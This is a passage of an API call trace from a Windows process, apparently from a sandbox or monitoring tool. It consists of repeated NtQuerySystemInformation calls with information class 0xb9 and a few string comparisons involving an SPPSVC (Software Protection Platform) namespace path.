SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe1c0, Length=0x28, ResultLength=0x0) [0208.860] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.868] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x28, ResultLength=0x0) [0208.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x28, ResultLength=0x0) [0208.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x28, ResultLength=0x0) [0208.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe010, Length=0x28, ResultLength=0x0) [0208.869] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.870] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe090, Length=0x28, ResultLength=0x0) [0208.871] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe090, Length=0x28, ResultLength=0x0) [0208.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdff0, Length=0x20, ResultLength=0x0) [0208.872] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0) [0208.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0) [0208.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0) [0208.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdff0, Length=0x20, ResultLength=0x0) [0208.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf80, Length=0x20, ResultLength=0x0) [0208.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf80, Length=0x20, ResultLength=0x0) [0208.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe1c0, Length=0x28, ResultLength=0x0) [0208.874] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x28, ResultLength=0x0) [0208.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x28, ResultLength=0x0) [0208.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x28, ResultLength=0x0) [0208.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe010, Length=0x28, ResultLength=0x0) [0208.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe090, Length=0x28, ResultLength=0x0) [0208.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe090, Length=0x28, ResultLength=0x0) [0208.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdff0, Length=0x20, ResultLength=0x0) [0208.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0) [0208.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0) [0208.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0) [0208.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdff0, Length=0x20, ResultLength=0x0) [0208.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf80, Length=0x20, ResultLength=0x0) [0208.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf80, Length=0x20, ResultLength=0x0) [0208.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe1c0, Length=0x28, ResultLength=0x0) [0208.882] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x28, ResultLength=0x0) [0208.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x28, ResultLength=0x0) [0208.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x28, ResultLength=0x0) [0208.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe010, Length=0x28, ResultLength=0x0) [0208.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe090, Length=0x28, ResultLength=0x0) [0208.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe090, Length=0x28, ResultLength=0x0) [0208.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdff0, Length=0x20, ResultLength=0x0) [0208.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0) [0208.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0) [0208.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0) [0208.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdff0, Length=0x20, ResultLength=0x0) [0208.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf80, Length=0x20, ResultLength=0x0) [0208.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf80, Length=0x20, ResultLength=0x0) [0208.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe1c0, Length=0x28, ResultLength=0x0) [0208.890] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe240, Length=0x50, ResultLength=0x0) [0208.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x28, ResultLength=0x0) [0208.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x28, ResultLength=0x0) [0208.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfa0, Length=0x28, ResultLength=0x0) [0208.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe010, Length=0x28, ResultLength=0x0) [0208.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe090, Length=0x28, ResultLength=0x0) [0208.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe090, Length=0x28, ResultLength=0x0) [0208.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdff0, Length=0x20, ResultLength=0x0) [0208.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0) [0208.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0) [0208.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf70, Length=0x20, ResultLength=0x0) [0208.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe170, Length=0x38, ResultLength=0x0) [0208.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdff0, Length=0x20, ResultLength=0x0) [0208.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf80, Length=0x20, ResultLength=0x0) [0208.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdf80, Length=0x20, ResultLength=0x0) [0208.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.898] NtQuerySystemInformation 